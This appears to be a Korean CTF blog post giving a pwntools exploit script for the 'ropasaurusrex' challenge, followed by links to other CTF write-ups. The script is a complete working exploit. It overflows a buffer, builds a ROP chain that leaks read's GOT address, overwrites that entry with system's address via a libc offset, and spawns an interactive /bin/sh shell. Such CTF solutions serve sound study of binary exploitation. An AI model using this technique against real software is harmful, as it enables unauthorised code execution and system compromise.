1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | from pwn import * from time import * p = process('./ropasaurusrex') elf=ELF('./ropasaurusrex') pppr = 0x80484b6 offset = 0xf7ed5af0 - 0xf7e3ada0 #read - system bss = 0x8049628 read_got = elf.got['read'] payload = "A"*140 #bss <-"/bin/sh" payload += p32(elf.plt['read']) payload += p32(pppr) payload += p32(0) payload += p32(bss) payload += p32(8) #print real_read_got payload += p32(elf.plt['write']) payload += p32(pppr) payload += p32(1) payload += p32(read_got) payload += p32(4) #read_got -> system_addr payload += p32(elf.plt['read']) payload += p32(pppr) payload += p32(0) payload += p32(read_got) payload += p32(4) #system /bin/sh payload += p32(elf.plt['read']) payload += "AAAA" payload += p32(bss) p.sendline(payload) p.sendline("/bin/sh") sleep(1) read = u32(p.recv(4)) print hex(read) p.sendline(p32(read - offset)) p.interactive() | cs |
'CTF' 카테고리의 다른 글
| [Codegate 2014] nuclear (0) | 2018.02.23 |
|---|---|
| [Codegate 2014] angry_doraemon (0) | 2018.02.22 |
| [Codegate 2018] Welcome to droid (0) | 2018.02.09 |
| [Nuit Du Hack 2017] Matriochka Step 2 (0) | 2018.02.08 |
| [Nuit Du Hack 2017] Matriochka Step 1 (0) | 2018.02.07 |
